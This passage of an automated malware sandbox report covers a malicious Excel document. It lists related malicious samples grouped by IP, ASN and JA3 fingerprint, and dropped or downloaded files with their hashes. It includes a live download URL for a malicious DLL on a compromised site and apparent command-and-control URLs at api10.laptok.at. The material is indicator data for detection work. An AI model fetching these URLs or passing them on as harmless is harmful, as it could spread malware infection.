	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	47.241.19.44
	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	47.241.19.44
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	47.241.19.44
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	47.241.19.44
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	NEW ORDER.exe	Get hash	malicious	Browse	34.102.136.180
	swift-copy-pdf.exe	Get hash	malicious	Browse	34.102.136.180
	selfassessment.docm	Get hash	malicious	Browse	142.250.179.194
	selfassessment.docm	Get hash	malicious	Browse	216.58.214.2
	selfassessment.docm	Get hash	malicious	Browse	142.250.179.194
	fedex.apk	Get hash	malicious	Browse	172.217.19.202
	u8xtCk7fq8.dll	Get hash	malicious	Browse	35.228.31.40
	Details!!.exe	Get hash	malicious	Browse	34.102.136.180
	RFQ 2027376.xlsx	Get hash	malicious	Browse	34.102.136.180
	FEB_2021.EXE	Get hash	malicious	Browse	34.102.136.180
	y0CRLCaQxA.exe	Get hash	malicious	Browse	142.250.102.155
	2200.dll	Get hash	malicious	Browse	35.228.31.40
	RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXE	Get hash	malicious	Browse	34.102.136.180
	#Ud83d#Udcde.htm	Get hash	malicious	Browse	142.250.179.193
	Spotify-v8.5.94.839_build_68949745-Mod-armeabi-v7a.apk	Get hash	malicious	Browse	172.217.17.110
	SecuriteInfo.com.Heur.20369.xls	Get hash	malicious	Browse	216.239.32.21
	#U2261#U0192#U00f4#U20a7.htm.htm	Get hash	malicious	Browse	142.250.179.193
	index_2021-02-11-18_10	Get hash	malicious	Browse	172.217.20.106
	att-1664057138.xls	Get hash	malicious	Browse	216.239.34.21
	1Akrien.exe	Get hash	malicious	Browse	8.8.8.8
UNIFIEDLAYER-AS-1US	SecuriteInfo.com.Trojan.GenericKD.36331762.27175.exe	Get hash	malicious	Browse	192.185.100.216
	Consolidated Order #01846.doc	Get hash	malicious	Browse	192.185.129.64
	PURCHASE ORDER.xlsx	Get hash	malicious	Browse	192.185.100.216
	2021_036,pdf.exe	Get hash	malicious	Browse	192.185.115.165
	FedExi J#U00c4LGIMISANDMED-pdf.exe	Get hash	malicious	Browse	192.254.234.35
	Shipping Doc.exe	Get hash	malicious	Browse	50.87.179.128
	file.exe	Get hash	malicious	Browse	192.254.224.94
	P.O-DT1692.exe	Get hash	malicious	Browse	50.87.193.142
	Payment_Advice.exe	Get hash	malicious	Browse	50.116.87.163
	RFQ-Zeeco_No.54655435.exe	Get hash	malicious	Browse	192.185.163.69
	Brewin-UPDATE.htm	Get hash	malicious	Browse	162.241.124.43
	Thursday, February 11th, 2021, 20210211033346.3BD4A181171AEBE1@gotasdeamor.cl.htm	Get hash	malicious	Browse	50.87.150.0
	doc_60987865467678.pdf.exe	Get hash	malicious	Browse	162.241.30.80
	agreement (19).xls	Get hash	malicious	Browse	162.214.119.40
	agreement (19).xls	Get hash	malicious	Browse	162.214.119.40
	yU6cC566nY.exe	Get hash	malicious	Browse	162.241.123.75
	Claim-528253739-02092021.xls	Get hash	malicious	Browse	192.185.112.213
	Claim-528253739-02092021.xls	Get hash	malicious	Browse	192.185.112.213
	Claim-528253739-02092021.xls	Get hash	malicious	Browse	192.185.112.213
	Claim-528253739-02092021.xls	Get hash	malicious	Browse	192.185.112.213
LINODE-APLinodeLLCUS	Attachment_65778.xlsb	Get hash	malicious	Browse	85.90.247.25
	SCD10093264.jpg.exe	Get hash	malicious	Browse	176.58.112.29
	SecuriteInfo.com.Heur.31861.xls	Get hash	malicious	Browse	176.58.123.25
	osiris.exe	Get hash	malicious	Browse	139.162.210.252
	2021_036,pdf.exe	Get hash	malicious	Browse	198.58.118.167
	Io8ic2291n.doc	Get hash	malicious	Browse	212.71.237.140
	SecuriteInfo.com.Exploit.Siggen3.9634.31858.xls	Get hash	malicious	Browse	176.58.123.25
	SCD10093264.jpg.exe	Get hash	malicious	Browse	172.105.245.119
	attach-543652551.xls	Get hash	malicious	Browse	45.79.142.211
	QgWarCS5Z4.exe	Get hash	malicious	Browse	45.79.142.211
	0zwHgf4MZ6.exe	Get hash	malicious	Browse	176.58.123.25
	WlgBUuBdZm.exe	Get hash	malicious	Browse	45.79.142.211
	7gRAlM4oGO.exe	Get hash	malicious	Browse	45.79.142.211
	attach-652257188.xls	Get hash	malicious	Browse	45.79.142.211
	fr2iSA8S29.exe	Get hash	malicious	Browse	45.79.142.211
	PvvkzXgMjG.exe	Get hash	malicious	Browse	178.79.169.237
	pfjgWtj6ms.exe	Get hash	malicious	Browse	198.58.118.167
	SK8HSWos1p.rtf	Get hash	malicious	Browse	172.104.26.201
	849IlNGgPo.exe	Get hash	malicious	Browse	45.79.142.211
	CaAmqz52Yk.exe	Get hash	malicious	Browse	45.79.142.211

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	658908343Bel.html	Get hash	malicious	Browse	162.241.169.26
	#Ud83d#Udcde Herbalife.com AudioMessage_50-74981.htm	Get hash	malicious	Browse	162.241.169.26
	SecuriteInfo.com.Variant.Razy.292793.13062.exe	Get hash	malicious	Browse	162.241.169.26
	WinRAR_1845561462.exe	Get hash	malicious	Browse	162.241.169.26
	DHL_6368638172 receipt document,pdf.exe	Get hash	malicious	Browse	162.241.169.26
	SecuriteInfo.com.VB.Heur.EmoDldr.32.39676696.Gen.27336.doc	Get hash	malicious	Browse	162.241.169.26
	Attachment_65778.xlsb	Get hash	malicious	Browse	162.241.169.26
	SCD10093264.jpg.exe	Get hash	malicious	Browse	162.241.169.26
	LawyerCustomerComplaint.exe	Get hash	malicious	Browse	162.241.169.26
	Detailed #460988.xlsm	Get hash	malicious	Browse	162.241.169.26
	Quotation_11-02-2021_WSBDJ.exe	Get hash	malicious	Browse	162.241.169.26
	Belegbeleg DHL_119040, pdf.exe	Get hash	malicious	Browse	162.241.169.26
	ORDER_73537.exe	Get hash	malicious	Browse	162.241.169.26
	PO FH87565635456.exe	Get hash	malicious	Browse	162.241.169.26
	o9VbySnzk7.exe	Get hash	malicious	Browse	162.241.169.26
	zJY9vCRKzw.exe	Get hash	malicious	Browse	162.241.169.26
	JOLeiluXFw.xls	Get hash	malicious	Browse	162.241.169.26
	document_bundle_87762.xls	Get hash	malicious	Browse	162.241.169.26
	VNw2n6L83X.exe	Get hash	malicious	Browse	162.241.169.26
	virtual_msg_0802202144982538203735468.html	Get hash	malicious	Browse	162.241.169.26

Dropped Files

No context

Created / dropped Files

C:\ProgramData\fsh\87.dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	475136
Entropy (8bit):	6.552503320211832
Encrypted:	false
SSDEEP:	6144:sBhG84Kky9tKle9GkuaooZt8ejcgWeE6JSymtrPAO3+Zz4ZaH2hxx8ZD+CBRz7:sBkoK8skuaooZtVjtEgpO3+GWGcZD3
MD5:	E0807C62C0FFDEAADD5DB75DAA38F584
SHA1:	B98850A2EA82EA8E6569A36BF8E068AFBC417BB5
SHA-256:	9AE7CCF3120EE0F1694141595DAF4E0D9E2BB787713AE14302812BFE95677CA4
SHA-512:	7EDFA85F0BF47A79DA00DC9639220BF8C9A55F58A4F5D31844F0ECEA875FEB4149DA8F8EBB276616FB49264A3E0D461FDAD32854D3C1F86EA5FC2016662E15AE
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........[.[.[.V.c.].V.a.J.V.^.U.V._.\...u.R.[...V.T.9.V.b.Z.V.e.Z.V.`.Z.Rich[.................PE..L....&.R...........!................@+....................................................@.............................O.......d....@.......................P..x6......8...............................@............................................text...?........................... ..`.rdata...=.......>..................@..@.data....<..........................@....rsrc........@......................@..@.reloc..x6...P...8..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7B42C271-6DA5-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	71272
Entropy (8bit):	2.0417800284553533
Encrypted:	false
SSDEEP:	192:rJZuZSX2S8WSBtS9fSaBMS7hS8tSJsSytSqOsSgTS7KsSOtSIlrSxSSbX:r/698wWs6jVdVdgBPSl
MD5:	62FB817F6198084E0B9D9BD61C55F4DD
SHA1:	91BB21AB08FDF0A8B999D22BB8B84D9AAF1177B8
SHA-256:	E09772A7EC30CA0FD1E7DCC616687B4E2580139EEFE52CA749FAC7CB819A7033
SHA-512:	77405DF6380F0EBE13ED555DB62290A2D458C6F95914B9FFCD36BF6660A9F30F5F406801B0F83CDE2949936A7445891D669EC7E7B115F3D24568DDE035DAC1C8
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7B42C273-6DA5-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27580
Entropy (8bit):	1.9121512196841715
Encrypted:	false
SSDEEP:	96:rGZJQ06WBSFjoOX2ocxWotModdWjtzELzIlWjtzELzrOCA:rGZJQ06WkFjp2xWOMWdUtQAlUtQTOCA
MD5:	E090F23A1FEAFCE7AF4E76C2141CA864
SHA1:	3C8B7E5BA7B0028473A6B69B3049876D59690805
SHA-256:	B4EBB0A315F866741CCFAB4237822BC58CEC4805347461747BE3C9F023BAB38A
SHA-512:	3F939CEAA3088B28EAE2A62712096D120E361AD93378821B8AA8138BF503CF60AEDA4F2411709692739C05DE22A30E6B51881F76E1D47656B1C58EC9ABEEE811
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7B42C275-6DA5-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.9165412119302623
Encrypted:	false
SSDEEP:	96:rhZqQb65BS2jB2VWOMaZhawJf84dAZ1hawJ8DawJf84d9A:rhZqQb65k2jB2VWOMaZhZ8qi1hSZ8q9A
MD5:	641E8A2EFDC39856B1CF2986CC3F3640
SHA1:	02544D95D63164458C66C85B5C349ACEB1ED2E50
SHA-256:	4236F885E4F137FF3EB6F32B11565EE274E822DA80D407E1116EB3753D606563
SHA-512:	18395D8FB788C5258A28C0C8D0497B0633CE68461F3F027A58B2412D5C988281D96B5D26A0CDD3862FABD99E7B4A7AA840790600AD5058C120B165D2FCF8C5F6
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7B42C277-6DA5-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.9186674114873632
Encrypted:	false
SSDEEP:	96:reZpQ06OBSkjF2dWfMcZ1fcM1G11ifcM1RA:reZpQ06OkkjF2dWfMcZ1kM811ikMLA
MD5:	008EE570A45777E08324BA4626048C00
SHA1:	3771B71ED84FF1CFD38E70CAFEC04C30CA5808A5
SHA-256:	277C2E0740E66F9BC30F46644176B36477939942F5B1687A8DB3E3AF5F04E62D
SHA-512:	357F681220191D7EBF3FDC9CDE86F6597534572F7190A669C4CA7B087B6FA9458A3F10F5DADAA35F8A835EF074037D264D2F19AA662396E428F9FAC06605722F
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\10C955FB-4BA9-49A9-ADB0-58D59856D9CE Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	132453
Entropy (8bit):	5.375769186614893
Encrypted:	false
SSDEEP:	1536:GcQceNquBXA3gBw+pQ9DQW+zA9H34ZldpKWXboOilXNErLKzEh:EDQ9DQW+z0XiT
MD5:	32DBAFB8ABDDFE04594B86A923940364
SHA1:	54C2AE25FEF098C08A3176471D8F991D53B1EA66
SHA-256:	334E5D8E5BF4F226F067CED0D34B7852D9D6BFA92A7A5080256897A3B7486A0D
SHA-512:	6D0A15346DA8918E709306EAF9A3F1BC690DC52FD8A1FB93EA6CFBF01158EE2CD2256D48F76B71C29AC172676A938B06A6188EA715D80EE946DACFF6074C0C95
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-12T17:43:10">.. Build: 16.0.13810.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8DCD84A8.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 1200 x 800, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33923
Entropy (8bit):	7.68545544084692
Encrypted:	false
SSDEEP:	384:/bJTVSjT1t05IO4gCdzJ22tjSKKSYkIfE8taQO30pTVuClvHzwCFGP4yQaf5dMlU:7w1C5GjhjjRgkNOLOkyPM4rM+H
MD5:	4A3975F458CA57A2E7A2139AD0B1F6AC
SHA1:	2D39BBE49EE7AA36EE363BF8113543A8CFD45FF5
SHA-256:	D1A22C76ABC644665B92855CD734250DD3B3E26E5CA40A9B1D5F4AD3367F9B69
SHA-512:	D12F9A21000241BC04CAD957667993C2AC12F5A9B2DABA5F64D5BC1023C16FBB5E43FBF9B6A1A8B8D7444AF7C26BD2F377CEC9E7A3E2F8DE9D73F3A979EBE044
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR....... .....3.......pHYs.................sRGB.........gAMA......a.....IDATx.....]u}7....@P\@Il...D..M...6..c..Z.....b+...O..>]..h..U..V...m5Ikk*.H..b.K.j.......?.3s.3w.r.......d..{.{f.g....m...{4....@.vO.....1......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`......=.m}q..4H...~.=.....3}..A...nO...7&.....F.......i..v..i.=...4....r`.!....Y.`.....5......Y.`.....5......Ys.B....z\|:~..........{.{../..[._l.......I.EV.~..i..?!m.......~/..E..~.Mi.A...C...X...L6...w.O.(........[>..n.`...>.y......~.].~M..m....q{.>....xv....}4...k...\|$1}^....~......L'.....'>5.......s.~...3_\|r.i?.......>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\J[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	339392
Entropy (8bit):	5.999967656351339
Encrypted:	false
SSDEEP:	6144:cDJl443S9YbS47Fk3Zsv12tXBQWgy01CGFSpjYC5osGAEcJMizvDupzStPX56:cB35u8u6vMFgy0cWUGlMv65oXM
MD5:	415DBB7F17A00913790F8E99ADBB9D93
SHA1:	C7D1A1B88A46A1E65B109257BFFFB5259900AF17
SHA-256:	3A7B725B6B273BFCFDBEC5A06868562AD848034EFBA247BE5739858768FC3B0A
SHA-512:	39C6EB2B71D0D68E0AEAC7DF2CCBDA743633A94895D90DC2569D866F1490A33200BEB29AC31573F2814E78487FF6FC50D492AC049213C8542ACE6BF23F24D048
Malicious:	false
Reputation:	low
IE Cache URL:	http://api10.laptok.at/api1/FnFXZRWsgaOv/P6JvZtKT1UO/agHdP9HeJ299dx/NjFG3Ft3KB32OuetXL2sT/DABW2CvkhTj1mHcu/d2rOfCnZM39ngVM/pgEkPfy7WZBHt2_2BI/8hIbLV9eh/Nxh_2BSaIH1v25_2Fy2g/jQtR51J9UQmW5hGZQSs/bUByYCCGCjlzccS8n_2Fr1/2TxpWMxaih6Zd/1FC2e6YZ/ytawmZHSR4fCdrk_2BuzGs2/I_2Fe7DGRd/nrzf8JbWsmL4ZMLw8/AiFgBOzN747U/qJ5myKX5wF4/23oTR339hxhZPv/OxZ3q5cF_2BQi5HeJCCQ3/czqNoTGtPyg5zMIR/bO5RZf4FOlJ/J
Preview:	6jOtPWjpJsKgG9IhgDi2XnSCJeSPxONX1nV8WY+GCWFWyqgjjf6aBHZ4Gm39WG35NlAjlSFMwsnGPoXAWLoM/VLRnXdPawnt6pIAayjW023ZgrADWj9Fjr/hEsQCUe4YN7RczMhFfFBSJE/eeaHpbpQOy3XXJLCECMM3JawVyKI5iDJIFdt8LR0d0hT19sg73Ioo/OjZ0sudP5iixOsSUCP++ITfM5DX+ewXXNSgm3azZl1EqLWpD9YZWm1PgJLqtij73+/eCtHQdmU+FFqUDQ3Xnpks7WjfKicoK3vhxYzfuwHE3AUCMVgzwFEzknjCe9uIblPLxqxWMU6JLDpeSTbcyxbKggkrp+O89ZEF+bScp5n9Jc1fsIkM9Ncw15Qt0YTxV/MgV22XDxC1hTWXMQuNHwUzeqTfFvh26+BNxM/PwN5yOJhezaNZpQp7q9tDSNskdDTftyq4K8ofKgCZv15zm+l5u7/Mcd5nxwUPW5WsXa7ib9QPplhF063avjRaAFWVpamPBkQP1N1SoIbNNFsgzHlH79gPaBwu3X1dEAe3blRumLGYr8OAsEwvbOVxJvLh6q753BMvZjXGdTk+9dFyubDa1jpLDtD176vNa++TwgurI3dCIbwwGkxT+S7BtkCz2UsVl8/oxv+pyVqTuFWJNBVsjmMBTH+o6ixzyxY4kCoQ14J3W6MW8QSctnAS2US5UlzBdCiE7HQNno7026e8F26RpsiAmcjtEeqQ38jAnTbDfOm/u+sBYDbOeAwpBjLG/DryeM3Qi9w7O6LujG5iaCPrVUxgHhW5/6oMR8sdtLTYSw3ERvJPdZq/pt+pOqSVnTDfixNvt8OAYhiEKwuSyGf5nQHyRruX1Tvy+NIGP/+PTpz8rcqR3pPUYDDDZA7zg4T1I/Y2vuZ1crSAZAJy6aXwJD0XSAvEzXw3OBHfnIBt14DTppquKuqVJanzB0revx3N8H8GUUIncQil4aNk4MPGk5P4qJOiPkQT

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\9FNesaJS[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	270440
Entropy (8bit):	5.999927116066864
Encrypted:	false
SSDEEP:	6144:Y+0C7j1OHxuaO32a5uF6e/jwm+JBJk18h++os7c2Wq/:YQ9Oc35663Xxb157cI/
MD5:	E924EC561FB47C3C0077569F989E9945
SHA1:	7B779431CDFB4199AB382029420C49A8E7145CBD
SHA-256:	620F9E87417B9B64C9CA5D8C86EADC68BE4EFBCD4F829857AA3E88CBCF8FFCEA
SHA-512:	61258962ADD49591F56ADE96442EF93067AB937903798757CE620AE1B6A7E05FCB4703A3CC25764A71963BC848E9924B20631A88511E48F0C93BF24AA079941A
Malicious:	false
Reputation:	low
IE Cache URL:	http://api10.laptok.at/api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07ZqQ_2BIY5i/gaJx2nrBRbCwokKD6i/TmP3yOyRd/UIWhx47302AAtFE31oP0/QH6kOp10Kt5yvTIaAYa/LK0GUog4M1OCTVMD4H5Cd4/y7Hidc3RQ475o/Nxk1_2FU/AOpYSuCaFqv8yJoz1d98uE0/RGNbcUJDfT/THwRpNZtVSPwcxLQu/JgOmTTbGBEY6/RAYX3HI935J/bkHevlKXRebACN/zYCEHnvaIKYWA35nI5OI7/Zng6uRiwb/9FNesaJS
Preview:	Mh76sSvSPOqc78Mw1cXKmfvRxMwaaWEKesJW7t3AmxNSv6lyFLsUY4n83l6Yoab2uwOf2DkFEA20NBf2B/PlNW0FGgZF1zakBvAAiOohIBorvfHvu0rE0MTzKZI6eVDmHbEQVaVPC4JsjuGf0N7E+9nHMyKQy+eomLvq8xg7jOLLutl9wiglWRzIFsmqwKpy+Jx9CmX6prDnV+YbPCPCzDGpeIOViLBndJ5aTmSzWtf9aozMC9nrgnDUx4Ja12aZHw96rQjFCZxnto2efGDVoGagL1Qb4es8tZyBB98MqaOkN3gT5988hQ+TylRyO5K4lVE2vU6ZAQDWQS7QTAWcVobl/1/Fox/23pZzLEIOLVJ/WfeqCtGDEE4bg8MFrEqWgAnzbeqJAbvubaYyD+0+Zcl/QheXkuMWbqBVzsn7YJZl11v+XPwuTsUH5WeJvTk+FAdawWNtrMlftd/5E8XgzDC/GoU1RPapJvOBn4UQnvupdMy8aUXPwNvTlZyncvCeIkr6420wlShxBVKfmC/p4CKUGM/0Yv46mRy3vfvWoM+DtcTTZOTd6uI32X/2ZWZzW1PC1xjLuJj+8pSGzgC9qGzoy5mXq1Jr731LoMV/sc6Vvm+ZvYN4Rd7G2gqgEK/DM4x+8pRx6WlgFvZLkEfp1NRz28ySvazWWxtjhFJmVW+2mpNjMQF5be5jSkmr2L6IGNu+780K4UJeiStDfPCA+xYYEXw9+fIw35o6XmsmSNuR3mzl8LKK/wAOyo/qIpQbX1D1EMIdW515W1AY8WwNEtN6Ri2otZ2LWGX0anUNlUxeO9PP6PypAKVYJ8CkE2JjqkpT0qeevIhmgtanzqUQxFa66tcEkAxsRnwObim3obpVGch3Sq3RpEiLvbZAO8UBrtIcqyiuJgmDTq+L/EZpdrTIioUAumq9Zl0hnteCIUF+35rXjTsfnkl7axJeycpBVo3+yFRHLOp1Jwc+dmTYtlD1/fd48Q/Z0cmd511h

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\2ZOSFMw[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2464
Entropy (8bit):	5.985101502504591
Encrypted:	false
SSDEEP:	48:IwgrwffRMN+4xpihcoAtmdydQ+nR4z3Swa0FUBmmX3Aw6Ixt6iMibzuM8WyVN:Iwgk3RFutmKQi4r1kHAwjxpV2M8L
MD5:	A214C9D621F37A4A5DD418FE4B986283
SHA1:	96B4D5DED9599F50A7557A927384A054721496C6
SHA-256:	A63A214D997D6A6B91E278F99EE16E9EDD06ABC4C515797838E22B8E59C96784
SHA-512:	9D7F21113869653138AF6DE31ED741CC17EA7C5FD0EA2540290AB31B1730E77D0226C0565328466B7A578074F4793EAE14E881E69D7C2F8D5D354A130E97779E
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0dYaBh2VTFZ3ie/AQvPNAeKAbUpEx_2BIA_2F/yqBcCuGKcxWU4/7_2FDUSL/tmEKyuvK3UnsOb7GxJhyB1v/eAgP5jhU7c/4LQdBuTq0iBob66eg/RKZ75u7U2Jkq/Bh_2B1mS8Vw/lDNXKg1S3Gc5QV/zwawyAQoh3ycAGCJJd6YY/crMtievOTWbq6IjA/LAnATbCyag_2Bwn/5yU0_2BoSAkzUKbcl_/2BAXWx8K4/WLBZv2PnGv5crOgJCyib/ZVr6kC0SezCKLbzs2jt/2ZOSFMw
Preview:	yH1jdu6A3JXa3Lq3zi2fILvgOkzlvcXN9uLrxhqmjf7xZ9FlGvpMoGwaRCwOHC/VJHobp6f5mxQDagdXf/UAykqOez2iAi8S1QTxI5RjciQ9M3zJ0gO+uB+8UjKkmhXXi8zFhjqj6P/xOgW/cj3KpjoEfV447fouT6/cGaELhOBtGrGYRpwNPPm+4diOo2POKlysoWnAzdgVA5dtjvhPkBXKpqO7l/JlZHCGmL1OvwLvkrTbCf1U4Tq4/HT/NrZ22ih3uLfsgJooHHxSOzfrHo666q7tTAmlZ1UntrTIm/QQmAjpFTqZavEeuxOCFsISObUg7E5LQ1dIfLBq0oQ4ksS/1KnZAuSTq4SNqmSu9DW4uAQkIk+N9gy6ZFeIf7xvhvpAixu+hYTmR9yLxU/Qb0z1aBU4Hj8ERvvOz/MKwQd5VBw43xKJJOF5BBMU3Pki/SXdkzLqVWVHG2Rg57xug1xL7LMC7zWaP8R7J1vMH0AgFkJ2nfTlFNCjm+KQa/t+BbaaQFyBcVeVpQ3pF2nvbiiwK2n8sE0k4Ph7uoIzN2yMwbgHk3+anOifiPAhaMju58fIJ4WaUvwESVZkBw/hGX7XpxAPBTdEbRvnLspelcDP659e9xh9ql7VgTtCF1cArfTXZbhjik8shl2NFbFC0Hvj/DseaIhwN/UHuS1BoHf8TNQ6i103oFq7s7Krif5AkWhM9ch6ZDz42UUt4OvaHicTbXJfHWLH6jF9O8P3Bmfe/7fbd4ZsW2A/bjkowyXYhKJfNQJliooD/r2+3MNXX3b60IE/20q+rVPqJer3QaqMAc6GhvUMEwiYYX4m2+Vt44nItwj+CZYK36CiIq6z/3Hukr1gIDWJ7ExtFGVnhs2ZHRZ+3AMz2J0gr9iFY2pdTXgeJA40mOUlHiYdnLVe3/K+oqbSSc95y3pVukE2MDbyJa6owW73M6kqG/cptKjYODRdeQSR5esF7eSOaeJq+I9U8qtrhkqaUmKyiXcq

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	475136
Entropy (8bit):	6.552503320211832
Encrypted:	false
SSDEEP:	6144:sBhG84Kky9tKle9GkuaooZt8ejcgWeE6JSymtrPAO3+Zz4ZaH2hxx8ZD+CBRz7:sBkoK8skuaooZtVjtEgpO3+GWGcZD3
MD5:	E0807C62C0FFDEAADD5DB75DAA38F584
SHA1:	B98850A2EA82EA8E6569A36BF8E068AFBC417BB5
SHA-256:	9AE7CCF3120EE0F1694141595DAF4E0D9E2BB787713AE14302812BFE95677CA4
SHA-512:	7EDFA85F0BF47A79DA00DC9639220BF8C9A55F58A4F5D31844F0ECEA875FEB4149DA8F8EBB276616FB49264A3E0D461FDAD32854D3C1F86EA5FC2016662E15AE
Malicious:	true
IE Cache URL:	https://cabogrupo.co.mz/wp-content/plugins/jetpack/json-endpoints/jetpack/11.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........[.[.[.V.c.].V.a.J.V.^.U.V._.\...u.R.[...V.T.9.V.b.Z.V.e.Z.V.`.Z.Rich[.................PE..L....&.R...........!................@+....................................................@.............................O.......d....@.......................P..x6......8...............................@............................................text...?........................... ..`.rdata...=.......>..................@..@.data....<..........................@....rsrc........@......................@..@.reloc..x6...P...8..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A9910000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	79072
Entropy (8bit):	7.753113095620733
Encrypted:	false
SSDEEP:	1536:etkJGZj1jky04VfBjr4+yBoBexvNGUOrQbmup:kSqj1I4PxyQemU8QbmI
MD5:	5D2D27662BA2BE492B65B4F9D6366AF6
SHA1:	D7A655BADA078546C29A8B99333AC112D55C5F6C
SHA-256:	EAC8C71F23ED8B7B18CDCE5C9379F6B0A482BA3713FCA0E413F8373EBBC94E96
